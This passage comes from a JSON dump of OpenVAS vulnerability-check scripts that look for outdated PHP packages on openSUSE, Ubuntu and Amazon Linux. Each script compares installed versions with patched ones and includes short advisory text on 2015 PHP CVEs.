rpm:\"php5-tokenizer-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.4.20~67.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for php5 USN-2758-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-5590", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-5589", "CVE-2015-6832", "CVE-2015-6838"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842472", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842472", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n#\n# Ubuntu Update for php5 USN-2758-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842472\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-01 07:12:58 +0200 (Thu, 01 Oct 2015)\");\n script_cve_id(\"CVE-2015-5589\", \"CVE-2015-5590\", \"CVE-2015-6831\", \"CVE-2015-6834\",\n \"CVE-2015-6835\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6836\",\n \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for php5 USN-2758-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php5'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered 
that the PHP phar extension\nincorrectly handled certain files. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service. (CVE-2015-5589)\n\nIt was discovered that the PHP phar extension incorrectly handled certain\nfilepaths. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-5590)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6831, CVE-2015-6834, CVE-2015-6835)\n\nSean Heelan discovered that PHP incorrectly handled unserializing\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6832)\n\nIt was discovered that the PHP phar extension incorrectly handled certain\narchives. A remote attacker could use this issue to cause files to be\nplaced outside of the destination directory. (CVE-2015-6833)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\ndata types. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6836)\n\nIt was discovered that the PHP XSLTProcessor class incorrectly handled\ncertain data. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service. 
(CVE-2015-6837)\");\n script_tag(name:\"affected\", value:\"php5 on Ubuntu 15.04,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2758-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2758-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(15\\.04|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.4+dfsg-4ubuntu6.3\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.4+dfsg-4ubuntu6.3\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.4+dfsg-4ubuntu6.3\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.4+dfsg-4ubuntu6.3\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.5.9+dfsg-1ubuntu4.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.5.9+dfsg-1ubuntu4.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res 
= isdpkgvuln(pkg:\"php5-cli\", ver:\"5.5.9+dfsg-1ubuntu4.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.5.9+dfsg-1ubuntu4.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.10-1ubuntu3.20\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1ubuntu3.20\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.10-1ubuntu3.20\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.3.10-1ubuntu3.20\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:59:50", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-10-22T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-7803", "CVE-2015-6835", "CVE-2015-7804"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120520", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120520", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the 
terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120520\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-22 08:25:44 +0300 (Thu, 22 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-601)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. 
Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php56 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-601.html\");\n script_cve_id(\"CVE-2015-7803\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-7804\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.14~1.119.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:59:14", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-10-22T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-602)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-7803", "CVE-2015-6835", 
"CVE-2015-7804"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120396", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120396\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-22 08:25:44 +0300 (Thu, 22 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-602)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in PHP. 
Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update php55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-602.html\");\n script_cve_id(\"CVE-2015-7803\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-7804\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php55-embedded\", rpm:\"php55-embedded~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-bcmath\", rpm:\"php55-bcmath~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-snmp\", rpm:\"php55-snmp~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-cli\", rpm:\"php55-cli~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mbstring\", rpm:\"php55-mbstring~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-ldap\", rpm:\"php55-ldap~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php55-pgsql\", rpm:\"php55-pgsql~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pdo\", rpm:\"php55-pdo~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pspell\", rpm:\"php55-pspell~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-dba\", rpm:\"php55-dba~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-common\", rpm:\"php55-common~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-odbc\", rpm:\"php55-odbc~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-enchant\", rpm:\"php55-enchant~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-xml\", rpm:\"php55-xml~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-soap\", rpm:\"php55-soap~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-fpm\", rpm:\"php55-fpm~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gmp\", rpm:\"php55-gmp~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-xmlrpc\", rpm:\"php55-xmlrpc~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-opcache\", rpm:\"php55-opcache~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-process\", rpm:\"php55-process~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-debuginfo\", rpm:\"php55-debuginfo~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php55-mcrypt\", rpm:\"php55-mcrypt~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55\", rpm:\"php55~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-devel\", rpm:\"php55-devel~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-imap\", rpm:\"php55-imap~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mssql\", rpm:\"php55-mssql~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mysqlnd\", rpm:\"php55-mysqlnd~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-recode\", rpm:\"php55-recode~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-tidy\", rpm:\"php55-tidy~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-intl\", rpm:\"php55-intl~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gd\", rpm:\"php55-gd~5.5.30~1.110.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:18", "description": "This host is installed with PHP and is prone\n to remote code execution vulnerability.", "cvss3": {}, "published": "2016-03-01T00:00:00", "type": "openvas", "title": "PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6836"], "modified": "2018-11-20T00:00:00", "id": "OPENVAS:1361412562310807505", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310807505", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_type_confusion_rce_vuln_mar16_lin.nasl 2016-03-01 16:56:54Z March$\n#\n# PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807505\");\n script_version(\"$Revision: 12431 $\");\n script_cve_id(\"CVE-2015-6836\");\n 